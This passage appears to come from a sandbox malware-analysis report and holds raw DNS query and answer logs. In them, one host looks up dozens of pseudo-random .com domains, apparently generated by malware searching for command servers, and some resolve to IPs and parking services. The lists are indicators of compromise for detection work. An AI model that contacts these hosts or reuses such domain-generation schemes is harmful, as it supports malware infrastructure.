                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.385081053 CET192.168.2.61.1.1.10x721bStandard query (0)gahydos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.385760069 CET192.168.2.61.1.1.10x5e28Standard query (0)pumyleg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.385926962 CET192.168.2.61.1.1.10x6bfaStandard query (0)pufypuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.396886110 CET192.168.2.61.1.1.10x2752Standard query (0)pupypil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.400593042 CET192.168.2.61.1.1.10xf531Standard query (0)lyryler.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.400737047 CET192.168.2.61.1.1.10x8f3bStandard query (0)gatyzyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.400873899 CET192.168.2.61.1.1.10x8a62Standard query (0)ganykah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.401611090 CET192.168.2.61.1.1.10x7bd9Standard query (0)gatypuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.401792049 CET192.168.2.61.1.1.10xaf7bStandard query (0)purylal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.402081013 CET192.168.2.61.1.1.10xed2bStandard query (0)gacynyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.402401924 CET192.168.2.61.1.1.10x827bStandard query (0)qegysiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.402713060 CET192.168.2.61.1.1.10xed44Standard query (0)vowykat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.402901888 CET192.168.2.61.1.1.10xbf43Standard query (0)qegyvag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.403043032 CET192.168.2.61.1.1.10xf69eStandard query (0)lygysid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.733179092 CET192.168.2.61.1.1.10x6b81Standard query (0)qekynyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.733474016 CET192.168.2.61.1.1.10xf670Standard query (0)lysysir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.733495951 CET192.168.2.61.1.1.10x3cd4Standard query (0)qebykoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.733902931 CET192.168.2.61.1.1.10xa622Standard query (0)lymylen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:40.734031916 CET192.168.2.61.1.1.10x8f0fStandard query (0)galyfez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.554846048 CET192.168.2.61.1.1.10x7023Standard query (0)gaqykoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.556314945 CET192.168.2.61.1.1.10xbac3Standard query (0)lyxynej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.566381931 CET192.168.2.61.1.1.10x5562Standard query (0)pumyjip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.566734076 CET192.168.2.61.1.1.10x4bb0Standard query (0)pupyteg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.567681074 CET192.168.2.61.1.1.10x5b7bStandard query (0)qeqykop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.571909904 CET192.168.2.61.1.1.10x9c1bStandard query (0)qedytyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.573148012 CET192.168.2.61.1.1.10xb9b6Standard query (0)volybak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.573973894 CET192.168.2.61.1.1.10x7a31Standard query (0)lymyjix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.574670076 CET192.168.2.61.1.1.10x7cd7Standard query (0)vonyjuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.576915026 CET192.168.2.61.1.1.10xd0c8Standard query (0)qekyvol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.577771902 CET192.168.2.61.1.1.10xd0f2Standard query (0)lysytyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.578217983 CET192.168.2.61.1.1.10x7743Standard query (0)vofypuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.582288980 CET192.168.2.61.1.1.10xb999Standard query (0)qebyhuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.585918903 CET192.168.2.61.1.1.10xc93fStandard query (0)qeqyqul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.587908983 CET192.168.2.61.1.1.10x70faStandard query (0)puzydog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.591660976 CET192.168.2.61.1.1.10xc472Standard query (0)ganyhus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.609992027 CET192.168.2.61.1.1.10x9702Standard query (0)gadypub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.610308886 CET192.168.2.61.1.1.10xe3beStandard query (0)galyvaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.614151001 CET192.168.2.61.1.1.10x13efStandard query (0)puzybeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.622056007 CET192.168.2.61.1.1.10xd263Standard query (0)lykyvor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.801790953 CET192.168.2.61.1.1.10x18a3Standard query (0)pujycil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.802035093 CET192.168.2.61.1.1.10x8b9cStandard query (0)gatyrah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.802381992 CET192.168.2.61.1.1.10x597aStandard query (0)qetyraq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.802584887 CET192.168.2.61.1.1.10x7dbdStandard query (0)purywoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.804702044 CET192.168.2.61.1.1.10x8660Standard query (0)puvygyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.804862022 CET192.168.2.61.1.1.10x1765Standard query (0)gahycuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.804878950 CET192.168.2.61.1.1.10xc3c2Standard query (0)vocygef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.805166960 CET192.168.2.61.1.1.10xc859Standard query (0)gacyfeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.805378914 CET192.168.2.61.1.1.10x920bStandard query (0)pufyxyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.805526972 CET192.168.2.61.1.1.10x48b5Standard query (0)vowyqik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.805604935 CET192.168.2.61.1.1.10x7633Standard query (0)gaqyqiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.805835962 CET192.168.2.61.1.1.10x20adStandard query (0)lyxyfan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.806076050 CET192.168.2.61.1.1.10x6e8eStandard query (0)qexyfag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.806180954 CET192.168.2.61.1.1.10x720aStandard query (0)lygyxux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.806718111 CET192.168.2.61.1.1.10x3f29Standard query (0)vofyzyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.808319092 CET192.168.2.61.1.1.10xa5c1Standard query (0)lyrywoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.848514080 CET192.168.2.61.1.1.10xd9d3Standard query (0)lyvygyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.853260994 CET192.168.2.61.1.1.10xa00aStandard query (0)vopyrem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.853765965 CET192.168.2.61.1.1.10x6c86Standard query (0)vojycit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:51:41.953929901 CET192.168.2.61.1.1.10x929eStandard query (0)qegyxup.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                  DNS Answers

                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                  Nov 11, 2024 18:50:27.751435041 CET1.1.1.1192.168.2.60xed30Name error (3)qekyqop.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:27.773113012 CET1.1.1.1192.168.2.60xa42dName error (3)lysynur.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:27.782449961 CET1.1.1.1192.168.2.60xab0dName error (3)volyqat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:27.795881033 CET1.1.1.1192.168.2.60xa0d8Name error (3)qedyfyq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:27.800216913 CET1.1.1.1192.168.2.60x2bdbName error (3)pumyxiv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:27.815541029 CET1.1.1.1192.168.2.60x6851Name error (3)vonyzuf.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:27.816816092 CET1.1.1.1192.168.2.60xc00fName error (3)lyxywer.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:27.832530975 CET1.1.1.1192.168.2.60xb4a4Name error (3)vojyjof.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:27.944394112 CET1.1.1.1192.168.2.60x55eaNo error (0)vonypom.com18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:27.952097893 CET1.1.1.1192.168.2.60x7328No error (0)lymyxid.com3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:27.968569994 CET1.1.1.1192.168.2.60x2bcaServer failure (2)lysyfyj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.249588966 CET1.1.1.1192.168.2.60xc82cNo error (0)galyqaz.com199.191.50.83A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.367583990 CET1.1.1.1192.168.2.60x169bName error (3)qekykev.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.368560076 CET1.1.1.1192.168.2.60x824fName error (3)purycap.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.372744083 CET1.1.1.1192.168.2.60xeee6Name error (3)qebytiq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.374234915 CET1.1.1.1192.168.2.60xb466Name error (3)ganypih.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.374922991 CET1.1.1.1192.168.2.60x8f45Name error (3)lykyjad.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.375605106 CET1.1.1.1192.168.2.60x9417Name error (3)vopybyt.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.377393007 CET1.1.1.1192.168.2.60x18a4Name error (3)pufygug.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.383105040 CET1.1.1.1192.168.2.60xef39Name error (3)qexyryl.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.384108067 CET1.1.1.1192.168.2.60x258No error (0)gahyqah.com23.253.46.64A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.384108067 CET1.1.1.1192.168.2.60x258No error (0)gahyqah.com162.255.119.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.388629913 CET1.1.1.1192.168.2.60xeb06Name error (3)pujyjav.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.390916109 CET1.1.1.1192.168.2.60xe122Name error (3)gacyryw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.391107082 CET1.1.1.1192.168.2.60xa556Name error (3)galykes.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.391117096 CET1.1.1.1192.168.2.60x9584Name error (3)puvyxil.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.392107964 CET1.1.1.1192.168.2.60xe8e0Name error (3)qeqyxov.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.392117977 CET1.1.1.1192.168.2.60xdebName error (3)gahyhob.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.392851114 CET1.1.1.1192.168.2.60x9ea8Name error (3)qetyvep.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.392862082 CET1.1.1.1192.168.2.60xaf06Name error (3)puvytuq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.400861979 CET1.1.1.1192.168.2.60xeb6eName error (3)pupybul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.401792049 CET1.1.1.1192.168.2.60x21d8No error (0)qegyhig.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.401792049 CET1.1.1.1192.168.2.60x21d8No error (0)qegyhig.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.401968002 CET1.1.1.1192.168.2.60x706fName error (3)lyryfyd.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.402671099 CET1.1.1.1192.168.2.60x122fName error (3)gaqycos.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.403134108 CET1.1.1.1192.168.2.60x1d7fName error (3)qegyqaq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.403167009 CET1.1.1.1192.168.2.60xc5b7Name error (3)vowycac.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.403513908 CET1.1.1.1192.168.2.60x5eb1Name error (3)lygygin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.403744936 CET1.1.1.1192.168.2.60xa03bName error (3)lymysan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.407493114 CET1.1.1.1192.168.2.60x7a79Name error (3)qeqysag.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.412553072 CET1.1.1.1192.168.2.60x834aName error (3)vocyruk.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.415435076 CET1.1.1.1192.168.2.60x84fName error (3)pumypog.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.420938015 CET1.1.1.1192.168.2.60xb232Name error (3)lyryvex.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.421739101 CET1.1.1.1192.168.2.60x5c23Name error (3)vofymik.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.423144102 CET1.1.1.1192.168.2.60x99b8Name error (3)gaqydeb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.424077988 CET1.1.1.1192.168.2.60xa468Name error (3)vowydef.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.424088001 CET1.1.1.1192.168.2.60xd82eName error (3)gacyzuz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.425787926 CET1.1.1.1192.168.2.60xf810Name error (3)vofygum.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.426613092 CET1.1.1.1192.168.2.60x9a06Name error (3)puzywel.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.433950901 CET1.1.1.1192.168.2.60x5611Name error (3)volykyc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.441548109 CET1.1.1.1192.168.2.60xd6a0Name error (3)qedynul.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.442475080 CET1.1.1.1192.168.2.60x2d41Name error (3)qexylup.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.443753004 CET1.1.1.1192.168.2.60xc339Name error (3)lyvytuj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.444360018 CET1.1.1.1192.168.2.60x627cName error (3)pufymoq.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.444370985 CET1.1.1.1192.168.2.60x816cName error (3)lygymoj.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.444434881 CET1.1.1.1192.168.2.60x5c4fName error (3)gadyfuh.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.445256948 CET1.1.1.1192.168.2.60x9780Name error (3)gatyvyz.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.451479912 CET1.1.1.1192.168.2.60xf3cName error (3)lyxylux.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.464906931 CET1.1.1.1192.168.2.60xcef5Name error (3)purydyv.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.559668064 CET1.1.1.1192.168.2.60x4576No error (0)vocyzit.com44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.605309010 CET1.1.1.1192.168.2.60x60c7No error (0)qetyfuv.com44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.608741999 CET1.1.1.1192.168.2.60xb7b6No error (0)puzylyp.com75.2.71.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.608741999 CET1.1.1.1192.168.2.60xb7b6No error (0)puzylyp.com99.83.170.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.625744104 CET1.1.1.1192.168.2.60x23e5No error (0)lyvyxor.com208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.672666073 CET1.1.1.1192.168.2.60x6ee0No error (0)vojyqem.com77980.bodis.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.672666073 CET1.1.1.1192.168.2.60x6ee0No error (0)77980.bodis.com199.59.243.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.894217968 CET1.1.1.1192.168.2.60x88c7No error (0)gatyfus.com85.17.31.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.894217968 CET1.1.1.1192.168.2.60x88c7No error (0)gatyfus.com178.162.203.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.894217968 CET1.1.1.1192.168.2.60x88c7No error (0)gatyfus.com178.162.203.211A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.894217968 CET1.1.1.1192.168.2.60x88c7No error (0)gatyfus.com178.162.203.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.894217968 CET1.1.1.1192.168.2.60x88c7No error (0)gatyfus.com178.162.217.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.894217968 CET1.1.1.1192.168.2.60x88c7No error (0)gatyfus.com5.79.71.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.894217968 CET1.1.1.1192.168.2.60x88c7No error (0)gatyfus.com5.79.71.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:28.894217968 CET1.1.1.1192.168.2.60x88c7No error (0)gatyfus.com85.17.31.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:29.290683985 CET1.1.1.1192.168.2.60xfec2No error (0)gadyniw.com154.212.231.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:30.683914900 CET1.1.1.1192.168.2.60x807fNo error (0)ww8.galyqaz.comdeliver.trafficmotor.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:30.683914900 CET1.1.1.1192.168.2.60x807fNo error (0)deliver.trafficmotor.com45.79.19.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:30.683914900 CET1.1.1.1192.168.2.60x807fNo error (0)deliver.trafficmotor.com198.58.118.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:30.683914900 CET1.1.1.1192.168.2.60x807fNo error (0)deliver.trafficmotor.com45.33.2.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:30.683914900 CET1.1.1.1192.168.2.60x807fNo error (0)deliver.trafficmotor.com96.126.123.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:30.683914900 CET1.1.1.1192.168.2.60x807fNo error (0)deliver.trafficmotor.com45.33.20.235A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:30.683914900 CET1.1.1.1192.168.2.60x807fNo error (0)deliver.trafficmotor.com45.33.18.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:30.683914900 CET1.1.1.1192.168.2.60x807fNo error (0)deliver.trafficmotor.com45.33.30.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:30.683914900 CET1.1.1.1192.168.2.60x807fNo error (0)deliver.trafficmotor.com45.56.79.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:30.683914900 CET1.1.1.1192.168.2.60x807fNo error (0)deliver.trafficmotor.com173.255.194.134A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:30.683914900 CET1.1.1.1192.168.2.60x807fNo error (0)deliver.trafficmotor.com45.33.23.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:30.683914900 CET1.1.1.1192.168.2.60x807fNo error (0)deliver.trafficmotor.com72.14.185.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:30.683914900 CET1.1.1.1192.168.2.60x807fNo error (0)deliver.trafficmotor.com72.14.178.174A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:32.465537071 CET1.1.1.1192.168.2.60xa83bNo error (0)ww3.galyqaz.comsedoparking.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:32.465537071 CET1.1.1.1192.168.2.60xa83bNo error (0)sedoparking.com64.190.63.136A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.362049103 CET1.1.1.1192.168.2.60xe25aNo error (0)pupydeq.com13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.362049103 CET1.1.1.1192.168.2.60xe25aNo error (0)pupydeq.com76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.376848936 CET1.1.1.1192.168.2.60x394bName error (3)pujymip.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.377979040 CET1.1.1.1192.168.2.60xe995Name error (3)qebylug.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.381247044 CET1.1.1.1192.168.2.60xe91fName error (3)ganyzub.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.386140108 CET1.1.1.1192.168.2.60xfb1Name error (3)lykymox.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.393594027 CET1.1.1.1192.168.2.60x6337Name error (3)vopydek.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.397439957 CET1.1.1.1192.168.2.60xa8d2Name error (3)vojymic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.398766994 CET1.1.1.1192.168.2.60xdd56Name error (3)gatydaw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.404419899 CET1.1.1.1192.168.2.60xbddcName error (3)gahynus.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.416418076 CET1.1.1.1192.168.2.60xb058Name error (3)qetysal.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.417484999 CET1.1.1.1192.168.2.60x454eName error (3)lyvylyn.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.421250105 CET1.1.1.1192.168.2.60x5da1Name error (3)volymum.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.430557966 CET1.1.1.1192.168.2.60xb11bName error (3)vowypit.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.437861919 CET1.1.1.1192.168.2.60x81adName error (3)lymylyr.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.437875032 CET1.1.1.1192.168.2.60x1896Name error (3)gadydas.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.438379049 CET1.1.1.1192.168.2.60x7973Name error (3)puzymig.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.455542088 CET1.1.1.1192.168.2.60x7cbeName error (3)vofydac.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.455692053 CET1.1.1.1192.168.2.60x248dName error (3)qeqylyl.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.463515997 CET1.1.1.1192.168.2.60xbc7dName error (3)lyxymin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.463527918 CET1.1.1.1192.168.2.60x306aName error (3)gaqyzuw.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.465914965 CET1.1.1.1192.168.2.60xebbaName error (3)qexyqog.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                  Nov 11, 2024 18:50:33.469866991 CET1.1.1.1192.168.2.60xf96Name error (3)vowyzuk.comnonenoneA (IP address)IN (0x0001)false
